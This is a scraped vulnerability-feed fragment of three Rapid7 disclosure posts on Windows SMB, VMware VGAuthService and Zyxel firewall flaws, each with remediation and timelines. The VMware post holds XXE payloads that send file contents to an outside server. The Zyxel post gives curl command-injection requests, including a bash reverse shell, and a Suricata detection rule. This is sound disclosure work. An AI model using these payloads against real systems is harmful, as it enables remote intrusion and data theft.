"2022-05-20T19:14:42", "id": "RAPID7BLOG:DF545F327BFBC593DA87AAE7B9428479", "href": "https://blog.rapid7.com/2022/05/20/metasploit-weekly-wrap-up-157/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-14T17:59:30", "description": "\n\nA remote and unauthenticated attacker can trigger a denial-of-service condition on Microsoft Windows Domain Controllers by leveraging a flaw that leads to a null pointer deference within the Windows kernel. We believe this vulnerability would be scored as CVSSv3 [AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H&version=3.1>) or 7.5. This vulnerability was silently patched by Microsoft in April of 2022 in the same batch of changes that addressed the unrelated CVE-2022-24500 vulnerability.\n\n## Credit\n\nThis issue was fixed by Microsoft without disclosure in April 2022, but because it was originally classed as a mere stability bug fix, it did not go through the usual security issue process. In May, Spencer McIntyre of Rapid7 discovered this issue while researching the fix for CVE-2022-24500 and determined the security implications of CVE-2022-32230. It is being disclosed in accordance with [Rapid7\u2019s vulnerability disclosure policy](<https://www.rapid7.com/security/disclosure/>).\n\n## Exploitation\n\nCVE-2022-32230 is caused by a missing check in `srv2!Smb2ValidateVolumeObjectsMatch` to verify that a pointer is not null before reading a `PDEVICE_OBJECT` from it and passing it to `IoGetBaseFileSystemDeviceObject`. The following patch diff shows the function in question for Windows 10 21H2 (unpatched version 10.0.19041.1566 on the left).\n\n\n\nThis function is called from the dispatch routine for an SMB2 `QUERY_INFO` request of the `FILE_INFO / FILE_NORMALIZED_NAME_INFORMATION` class. Per the docs in MS-SMB2 section [3.3.5.20.1 Handling SMB2_0_INFO_FILE](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/d64e0451-64a2-425a-848e-52a7dddab7b9>), `FILE_NORMALIZED_NAME_INFORMATION` is only available when the dialect is 3.1.1.\n\nFor FileNormalizedNameInformation information class requests, if not supported by the server implementation&lt;392&gt;, or if Connection.Dialect is &quot;2.0.2&quot;, &quot;2.1&quot; or &quot;3.0.2&quot;, the server MUST fail the request with STATUS_NOT_SUPPORTED.\n\nTo trigger this code path, a user would open any named pipe from the IPC$ share and make a `QUERY_INFO` request for the `FILE_NORMALIZED_NAME_INFORMATION` class. This typically requires user permissions or a non-default configuration enabling guest access. This is not the case, however, for the noteworthy exception of domain controllers where there are multiple named pipes that can be opened anonymously, such as `netlogon`. An alternative named pipe that can be used but does typically require permissions is the `srvsvc` pipe.\n\nUnder normal circumstances, the `FILE_NORMALIZED_NAME_INFORMATION` class would be used to query the normalized name information of a file that exists on disk. This differs from the exploitation scenario which queries a named pipe.\n\nA system that has applied the patch for this vulnerability will respond to the request with the error `STATUS_NOT_SUPPORTED`.\n\n### Proof of concept\n\nA proof-of-concept Metasploit module is available on [GitHub](<https://github.com/zeroSteiner/metasploit-framework/blob/feat/mod/cve-2022-32230/modules/auxiliary/dos/smb/smb_filenormalizednameinformation.rb>). It requires Metasploit version 6.2 or later.\n\n## Impact\n\nThe most likely impact of an exploit leveraging this vulnerability is a denial-of-service condition. Given the current state of the art of exploitation, it is assumed that a null pointer dereference in the Windows kernel is not remotely exploitable for the purpose of arbitrary code execution without combining it with another, unrelated vulnerability.\n\nIn the default configuration, Windows will automatically restart after a BSOD.\n\n## Remediation\n\nIt is recommended that system administrators apply the official patches provided by Microsoft in their April 2022 update. If that is not possible, restricting access and disabling SMB version 3 can help remediate this flaw.\n\n## Disclosure timeline\n\n**April 12th, 2022** \u2013 Microsoft patches CVE-2022-32230 \n**April 29th, 2022** \u2013 Rapid7 finds and confirms the vulnerability while investigating CVE-2022-24500 \n**May 4th, 2022** \u2013 Rapid7 contacts MSRC to clarify confusion regarding CVE-2022-32230 \n**May 18th, 2022** \u2013 Microsoft responds to Rapid7, confirming that the vulnerability now identified as CVE-2022-32230 is different from the disclosed vulnerability CVE-2022-24500 with which it was patched \n**June 1, 2022** \u2014 Rapid7 reserves CVE-2022-32230 after discussing with Microsoft \n**June 14th, 2022** \u2013 Rapid7 releases details in this disclosure, and Microsoft publishes [its advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-32230>)\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n_**Additional reading:**_\n\n * _[The Hidden Harm of Silent Patches](<https://www.rapid7.com/blog/post/2022/06/06/the-hidden-harm-of-silent-patches/>)_\n * _[CVE-2022-22977: VMware Guest Authentication Service LPE (FIXED)](<https://www.rapid7.com/blog/post/2022/05/24/cve-2022-22977-vmware-guest-authentication-service-lpe-fixed/>)_\n * _[A Year on from the Ransomware Task Force Report](<https://www.rapid7.com/blog/post/2022/05/24/a-year-on-from-the-ransomware-task-force-report/>)_\n * _[CVE-2022-30525 (FIXED): Zyxel Firewall Unauthenticated Remote Command Injection](<https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/>)_[[ \n](<https://www.rapid7.com/blog/post/2022/05/24/a-year-on-from-the-ransomware-task-force-report/>)](<https://www.rapid7.com/blog/post/2022/05/24/a-year-on-from-the-ransomware-task-force-report/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-14T17:10:06", "type": "rapid7blog", "title": "CVE-2022-32230: Windows SMB Denial-of-Service Vulnerability (FIXED)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22977", "CVE-2022-24500", "CVE-2022-30525", "CVE-2022-32230"], "modified": "2022-06-14T17:10:06", "id": "RAPID7BLOG:729B902E7836EDA19BEC4A8EF1C066CF", "href": "https://blog.rapid7.com/2022/06/14/cve-2022-32230-windows-smb-denial-of-service-vulnerability-fixed/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-24T19:31:07", "description": "\n\nA low-privileged local attacker can prevent the VMware Guest Authentication service (VGAuthService.exe) from running in a guest Windows environment and can crash this service, thus rendering the guest unstable. In some very contrived circumstances, the attacker can leak file content to which they do not have read access. We believe this would be scored as CVSSv3 AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H or 6.1 and is an instance of [CWE-73: External Control of File Name or Path](<https://cwe.mitre.org/data/definitions/73.html>).\n\n## Product description\n\nThe VMware Guest Authentication Service (VGAuthService.exe) is part of the VMware Tools suite of software used to provide integration services with other VMware services. It is commonly installed on Windows guest operating systems, though it appears that its only function is to [mystify users](<https://www.google.com/search?q=vmware+%22Guest+Authentication+Service%22>) when it fails.\n\n## Credit\n\nThis issue was discovered by Jake Baines of Rapid7. It is being disclosed in accordance with [Rapid7's vulnerability disclosure policy](<https://www.rapid7.com/disclosure/>).\n\n## Exploitation\n\nThe versions of VMware host and guest operating systems are:\n\n * **Host platform: **MacOS Big Sur 11.6.1\n * **Host software: **VMware Fusion Professional 12.2.1 (18811640)\n * **Virtualized platform:** Windows 10.0.17763.1999 and Windows Server 2019\n * **Vulnerable software: **VGAuthService.exe (VMware Guest Authentication Service) \u201cFile version: 11.3.5.59284\u201d, \u201cProduct version 1.0.0. Build-18556986\u201d\n\nOnce running, the VMware Guest Authentication Service (VGAuthService.exe) is a service running with `NT AUTHORITY/SYSTEM` permissions and attempts to read files from the non-existent directory `C:\\Program%20Files\\VMware\\VMware%20Tools\\` during start-up.\n\n\n\nA low-privileged user can create this directory structure and cause VGAuthService.exe to read attacker controlled files. The files that the attacker controls are \u201ccatalog\u201d, \u201cxmldsig-core-schema.xsd\u201d, and \u201cxenc-schema.xsd\u201d. These files are used to define the XML structure used to communicate with VGAuthService.exe.\n\nHowever, actually modifying the structure of these files seems to have limited effects on VGAuthService.exe. Below, we describe a denial of service (which could take a number of forms) and a file content leak via XML External Entity.\n\n## Impact\n\nThe most likely impact of an exploit leveraging this vulnerability is a denial-of-service condition, and there is a remote possibility of privileged file content exfiltration.\n\n### Denial of service\n\nA low-privileged user can prevent the service from starting by providing a malformed catalog file. For example, creating the file C:\\Program%20Files\\VMware\\VMware%20Tools\\etc\\catalog with the contents of:\n \n \n <?xml version=\"1.0\"?>\n <!DOCTYPE catalog PUBLIC \"-//OASIS//DTD Entity Resolution XML Catalog V1.0//EN\" \"http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd\">\n <catalog xmlns=\"urn:oasis:names:tc:entity:xmlns:xml:catalog\">\n <uri name=\"http://www.w3.org/TR/2002/REC-xmldsig-core-20020212/xmldsig-core-schema.xsd\" uri=\"xmldsig-core-schema.xsd\"/>\n <uri name=\"http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/xenc-schema.xsd\" uri=\"\\\\10.0.0.2\\fdsa\\xenc-schema.xsd\"/>\n </catalog>\n \n\nWill simply prevent the service from ever running due to the malformed uri field. The VGAuthService log file in `C:\\ProgramData\\VMware\\VMware VGAuth\\logfile.txt.0` will contain this line:\n \n \n [2022-02-01T14:03:50.100Z] [ warning] [VGAuthService] XML Error: uri entry 'uri' broken ?: \\\\10.0.0.2\\fdsa\\xenc-schema.xsd\n \n\nAfter the \u201cmalicious\u201d file is created, the system must be rebooted (or the service restarted). Until this happens, some remote tooling for the VMware guest will not function properly.\n\n### File content exfiltration via XML external entity (XXE) attacks, and the limitations thereof\n\nVGAuthService uses XML libraries (libxmlsec and libxml2) that have XML External Entity processing capabilities. Because the attacker controls various XML files parsed by the service, the attacker in theory can execute XXE injection and XXE out-of-band (OOB) attacks to leak files that a low-privileged user can\u2019t read (e.g. C:\\windows\\win.ini).\n\nIt is true that these styles of attacks do work against VGAuthService.exe, but there is a severe limitation. Traditionally, an XXE OOB attack leaks the file of the attackers choosing via an HTTP or FTP uri. For example, \u201c[http://attackurl:80/endpoint?FILEDATA\u201d](<http://attackurl:80/endpoint?FILEDATA%E2%80%9D>) where FILEDATA is the contents of the file. However, the XML library that VGAuthService.exe is using, libxml2, is very strict about properly formatted URI and any space character or newline will cause the exfiltration to fail. For example, let\u2019s say we wanted to perform an XXE OOB attack and leak the contents of C:\\Windows\\win.ini. I\u2019d create the following file at `C:\\Program%20Files\\VMware\\VMware%20Tools\\etc\\catalog`\n \n \n <?xml version=\"1.0\" ?>\n <!DOCTYPE r [\n <!ELEMENT r ANY >\n <!ENTITY % sp SYSTEM \"http://10.0.0.2/r7.dtd\">\n %sp;\n %param1;\n ]>\n <r>&exfil;</r>\n \n\nAnd then we\u2019d create the file `r7.dtd` on 10.0.0.2:\n \n \n <!ENTITY % data SYSTEM \"file:///c:/windows/win.ini\">\n <!ENTITY % param1 \"<!ENTITY exfil SYSTEM 'http://10.0.0.2/xxe?%data;'>\">\n \n\nAnd server the r7.dtd file via a python server on 10.0.0.2:\n \n \n albinolobster@ubuntu:~/oob$ sudo python3 -m http.server 80\n Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...\n \n\nOnce the attack is triggered, VGAuthService.exe will make quite a few HTTP requests to the attackers HTTP server:\n \n \n Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n \n\nBut notice that none of those HTTP requests contain the contents of win.ini. To see why, let\u2019s take a look at VGAuthService\u2019s log file.\n \n \n [2022-02-01T14:34:00.528Z] [ warning] [VGAuthService] XML Error: parser \n [2022-02-01T14:34:00.528Z] [ warning] [VGAuthService] XML Error: error : \n [2022-02-01T14:34:00.528Z] [ warning] [VGAuthService] XML Error: Invalid URI: http:///10.0.0.2/xxe?; for 16-bit app support\n [fonts]\n [extensions]\n [mci extensions]\n [files]\n [Mail]\n MAPI=1\n \n\nHere, we can see the contents of win.ini have been appended to `http://10.0.0.2/xxe?` and that has caused the XML library to error out due to an invalid URI. So we can\u2019t leak win.ini over the network, but we were able to write it to VGAuthService\u2019s log. Unfortunately (or fortunately, for defenders), the log file is only readable by administrative users, so leaking the contents of win.ini to the log file is no good for an attack.\n\nAn attacker _can_ leak a file as long as it can be used to form a valid URI. I can think of one very specific case where ManageEngine has a \u201cuser\u201d saved to file as \u201c0:verylongpassword\u201d where this could work. But that\u2019s super specific. Either way, we can recreate this like so:\n \n \n C:\\>echo|set /p=\"helloworld\" > r7.txt\n \n C:\\>type r7.txt\n helloworld\n C:\\>\n \n\nWe then do the same attack as above, but instead of `<!ENTITY % data SYSTEM \"file:///c:/windows/win.ini\">` we do `<!ENTITY % data SYSTEM \"file:///c:/r7.txt\">`\n\nAfter executing the attack, we\u2019ll see this on our HTTP server:\n \n \n 10.0.0.88 - - [01/Feb/2022 07:25:05] \"GET /xxe?helloworld HTTP/1.0\" 404 -\n \n\nWhile this is technically a low-privileged user leaking a file, it is quite contrived, and honestly an unlikely scenario.\n\nAnother common XXE attack is leaking NTLM hashes, but libxml2 doesn\u2019t honor UNC paths so that isn\u2019t a possibility. So, in conclusion, the low-privileged attacker can only deny access to the service and, very occasionally, leak privileged files.\n\n## Remediation\n\nVMware administrators who expect low-privileged, untrusted users to interact directly with the guest operating system should apply the patch at their convenience to avoid the denial-of-service condition. As stated above, the likelihood of anyone exploiting this vulnerability to exfiltrate secrets from the guest operating system is quite low, but if those circumstances apply to your environment, more urgency in patching is warranted.\n\nIn the absence of a patch, VMware administrators can create the missing directory with write permissions limited to administrators, and this should mitigate the issue entirely.\n\n## Disclosure timeline\n\n * **February, 2022: **Issue discovered by Jake Baines of Rapid7\n * **Thu, Feb 24, 2022:** Initial disclosure to [security@vmware.com](<mailto:security@vmware.com>)\n * **Thu, Feb 24, 2022:** Issue tracked as VSRC-10022.\n * **Wed, Mar 02, 2022: **Vendor asks for an extension beyond original April disclosure date\n * **Mon, May 23, 2022:** CVE-2022-22977 reserved by the vendor\n * **Tue, May 24, 2022: **This disclosure, as well as the [vendor's disclosure](<https://www.vmware.com/security/advisories/VMSA-2022-0015.html>) published\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n_**Additional reading:**_\n\n * _[CVE-2022-30525 (FIXED): Zyxel Firewall Unauthenticated Remote Command Injection](<https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/>)_\n * _[2022 Cloud Misconfigurations Report: A Quick Look at the Latest Cloud Security Breaches and Attack Trends](<https://www.rapid7.com/blog/post/2022/04/20/2022-cloud-misconfigurations-report-a-quick-look-at-the-latest-cloud-security-breaches-and-attack-trends/>)_\n * _[CVE-2022-28810: ManageEngine ADSelfService Plus Authenticated Command Execution (Fixed)](<https://www.rapid7.com/blog/post/2022/04/14/cve-2022-28810-manageengine-adselfservice-plus-authenticated-command-execution-fixed/>)_\n * _[CVE-2022-24527: Microsoft Connected Cache Local Privilege Escalation (Fixed)](<https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-24T18:00:00", "type": "rapid7blog", "title": "CVE-2022-22977: VMware Guest Authentication Service LPE (FIXED)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22977", "CVE-2022-24527", "CVE-2022-28810", "CVE-2022-30525"], "modified": "2022-05-24T18:00:00", "id": "RAPID7BLOG:906A9E6EA4F0C790B0063AB06B04CFE0", "href": "https://blog.rapid7.com/2022/05/24/cve-2022-22977-vmware-guest-authentication-service-lpe-fixed/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-23T17:34:26", "description": "\n\nRapid7 discovered and reported a vulnerability that affects Zyxel firewalls supporting Zero Touch Provisioning (ZTP), which includes the ATP series, VPN series, and the USG FLEX series (including USG20-VPN and USG20W-VPN). The vulnerability, identified as CVE-2022-30525, allows an unauthenticated and remote attacker to achieve arbitrary code execution as the `nobody` user on the affected device.\n\nThe following table contains the affected models and firmware versions.\n\nAffected Model | Affected Firmware Version \n---|--- \nUSG FLEX 100, 100W, 200, 500, 700 | ZLD5.00 thru ZLD5.21 Patch 1 \nUSG20-VPN, USG20W-VPN | ZLD5.10 thru ZLD5.21 Patch 1 \nATP 100, 200, 500, 700, 800 | ZLD5.10 thru ZLD5.21 Patch 1 \n \nThe VPN series, which also supports ZTP, is not vulnerable because it does not support the required functionality.\n\n## Product description\n\nThe affected firewalls are [advertised](<https://www.zyxel.com/us/en/products_services/USG-FLEX-Firewall-USG-FLEX-700/features>) for both small branch and corporate headquarter deployments. They [offer](<https://www.zyxel.com/us/en/products_services/USG-FLEX-Firewall-USG-FLEX-700/license-and-spec>) VPN solutions, SSL inspection, web filtering, intrusion protection, and email security, and advertise up to 5 Gbps throughput through the firewall.\n\nThe affected models are relatively popular, with more than 15,000 visible on [Shodan](<https://www.shodan.io/search?query=title%3A%22USG+FLEX+100%22%2C%22USG+FLEX+100w%22%2C%22USG+FLEX+200%22%2C%22USG+FLEX+500%22%2C%22USG+FLEX+700%22%2C%22USG+FLEX+50%22%2C%22USG+FLEX+50w%22%2C%22ATP100%22%2C%22ATP200%22%2C%22ATP500%22%2C%22ATP700%22>).\n\n\n\n## CVE-2022-30525: Unauthenticated remote command injection\n\nThe affected models are vulnerable to unauthenticated and remote command injection via the administrative HTTP interface. Commands are executed as the `nobody` user. This vulnerability is exploited through the `/ztp/cgi-bin/handler` URI and is the result of passing unsanitized attacker input into the `os.system` method in `lib_wan_settings.py`. The vulnerable functionality is invoked in association with the `setWanPortSt` command. An attacker can inject arbitrary commands into the `mtu` or the `data` parameter. Below is an example `curl` that will cause the firewall to execute `ping 192.168.1.220`:\n \n \n curl -v --insecure -X POST -H \"Content-Type: application/json\" -d\n '{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\"\n :\"1\",\"vlanid\":\"5\",\"mtu\":\"; ping 192.168.1.220;\",\"data\":\"hi\"}'\n https://192.168.1.1/ztp/cgi-bin/handler\n \n\nOn the firewall, the `ps` output looks like the following:\n \n \n nobody 11040 0.0 0.2 21040 5152 ? S Apr10 0:00 \\_ /usr/local/apache/bin/httpd -f /usr/local/zyxel-gui/httpd.conf -k graceful -DSSL\n nobody 16052 56.4 0.6 18104 11224 ? S 06:16 0:02 | \\_ /usr/bin/python /usr/local/zyxel-gui/htdocs/ztp/cgi-bin/handler.py\n nobody 16055 0.0 0.0 3568 1492 ? S 06:16 0:00 | \\_ sh -c /usr/sbin/sdwan_iface_ipc 11 WAN3 4 ; ping 192.168.1.220; 5 >/dev/null 2>&1\n nobody 16057 0.0 0.0 2152 564 ? S 06:16 0:00 | \\_ ping 192.168.1.220\n \n\nA reverse shell can be established using the normal bash [GTFOBin](<https://gtfobins.github.io/gtfobins/bash/#reverse-shell>). For example:\n \n \n curl -v --insecure -X POST -H \"Content-Type: application/json\" -d '\n {\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\":\n \"1\",\"vlanid\":\"5\",\"mtu\":\"; bash -c \\\"exec bash -i &>/dev/tcp/\n 192.168.1.220/1270 <&1;\\\";\",\"data\":\"hi\"}' https://192.168.1.1\n /ztp/cgi-bin/handler\n \n\nThe resulting reverse shell can be used like so:\n \n \n albinolobster@ubuntu:~$ nc -lvnp 1270\n Listening on 0.0.0.0 1270\n Connection received on 192.168.1.1 37882\n bash: cannot set terminal process group (11037): Inappropriate ioctl for device\n bash: no job control in this shell\n bash-5.1$ id\n id\n uid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)\n bash-5.1$ uname -a\n uname -a\n Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux\n Bash-5.1\n \n\n## Metasploit module\n\nA [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/16563>) has been developed for these vulnerabilities. The module can be used to establish a `nobody` Meterpreter session. The following video demonstrates exploitation:\n\n\n\nWe\u2019ve shared a PCAP that captures Metasploit\u2019s exploitation of a Zyxel USG FLEX 100. The PCAP can be found attached to the module\u2019s [pull request](<https://github.com/rapid7/metasploit-framework/pull/16563>). The Metasploit module injects commands in the `mtu` field, and as such, the following Suricata rule should flag its use:\n \n \n alert http any any -> any any ( \\\n msg:\"Possible Zyxel ZTP setWanPortSt mtu Exploit Attempt\"; \\\n flow:to_server; \\\n http.method; content:\"POST\"; \\\n http.uri; content:\"/ztp/cgi-bin/handler\"; \\\n http.request_body; content:\"setWanPortSt\"; \\\n http.request_body; content:\"mtu\"; \\\n http.request_body; pcre:\"/mtu[\"']\\s*:\\s*[\"']\\s*[^0-9]+/i\";\n classtype:misc-attack; \\\n sid:221270;)\n \n\n## Credit\n\nThis issue was discovered by [Jake Baines](<https://www.rapid7.com/blog/author/jake-baines/>) of Rapid7, and it is being disclosed in accordance with [Rapid7's vulnerability disclosure policy](<https://www.rapid7.com/security/disclosure/>).\n\n## Remediation\n\nApply the vendor patch as soon as possible. If possible, enable automatic firmware updates. Disable WAN access to the administrative web interface of the system.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-30525 with a remote vulnerability check.\n\n## Disclosure timeline\n\nAstute readers will notice this timeline is a little atypical for Rapid7 disclosures. In accordance with our 60-day [disclosure policy](<https://www.rapid7.com/security/disclosure/>), we suggested a coordinated disclosure date in June. Instead, Zyxel released patches to address this issue on April 28, 2022. At that time, Zyxel did not publish an associated CVE or security advisory. On May 9, Rapid7 independently discovered Zyxel\u2019s uncoordinated disclosure. The vendor then reserved CVE-2022-30525.\n\nThis patch release is tantamount to releasing details of the vulnerabilities, since attackers and researchers can trivially reverse the patch to learn precise exploitation details, while defenders rarely bother to do this. Therefore, we're releasing this disclosure early in order to assist defenders in detecting exploitation and to help them decide when to apply this fix in their own environments, according to their own risk tolerances. In other words, silent vulnerability patching tends to only help active attackers, and leaves defenders in the dark about the true risk of newly discovered issues.\n\n**April 2022** \\- Discovered by Jake Baines \n**April 13, 2022** \\- Rapid7 discloses to [security@zyxel.com.tw](<mailto:security@zyxel.com.tw>). Proposed disclosure date June 21, 2022. \n**April 14, 2022** \\- Zyxel acknowledges receipt. \n**April 20, 2022** \\- Rapid7 asks for an update and shares delight over [\u201cHere is how to pronounce ZyXEL\u2019s name\u201d](<https://www.youtube.com/watch?v=I5nT-nRHvlU>). \n**April 21, 2022** \\- Zyxel acknowledges reproduction of the vulnerabilities. \n**April 28, 2022** \\- Zyxel releases patches without coordination with vulnerability reporter. \n**April 29, 2022** \\- Zyxel indicates patch is likely to release before June 14, 2022. \n**May 9, 2022** \\- Rapid7 realizes Zyxel already issued patches. Rapid7 asks Zyxel for a response on the silent patches and indicates that our team will publicly disclose the week of May 9, 2022. \n**May 10, 2022** \\- Zyxel reserves CVE-2022-30525 and proposes a new disclosure schedule. \n**May 12, 2022** \\- [Zyxel advisory](<https://www.zyxel.com/us/en/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml>), this disclosure bulletin, and Metasploit module published.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n_**Additional reading:**_\n\n * _[CVE-2022-28810: ManageEngine ADSelfService Plus Authenticated Command Execution (Fixed)](<https://www.rapid7.com/blog/post/2022/04/14/cve-2022-28810-manageengine-adselfservice-plus-authenticated-command-execution-fixed/>)_\n * _[CVE-2022-24527: Microsoft Connected Cache Local Privilege Escalation (Fixed)](<https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/>)_\n * _[CVE-2022-1026: Kyocera Net View Address Book Exposure](<https://www.rapid7.com/blog/post/2022/03/29/cve-2022-1026-kyocera-net-view-address-book-exposure/>)_\n * _[Analyzing the Attack Landscape: Rapid7\u2019s 2021 Vulnerability Intelligence Report](<https://www.rapid7.com/blog/post/2022/03/28/analyzing-the-attack-landscape-rapid7s-annual-vulnerability-intelligence-report/>)_[[[[ \n](<https://www.rapid7.com/blog/post/2022/03/29/cve-2022-1026-kyocera-net-view-address-book-exposure/>)](<https://www.rapid7.com/blog/post/2022/03/29/cve-2022-1026-kyocera-net-view-address-book-exposure/>)](<https://www.rapid7.com/blog/post/2022/03/29/cve-2022-1026-kyocera-net-view-address-book-exposure/>)](<https://www.rapid7.com/blog/post/2022/03/29/cve-2022-1026-kyocera-net-view-address-book-exposure/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T13:30:29", "type": "rapid7blog", "title": "CVE-2022-30525 (FIXED): Zyxel Firewall Unauthenticated Remote Command Injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1026", "CVE-2022-24527", "CVE-2022-28810", "CVE-2022-30525"], "modified": "2022-05-12T13:30:29", "id": 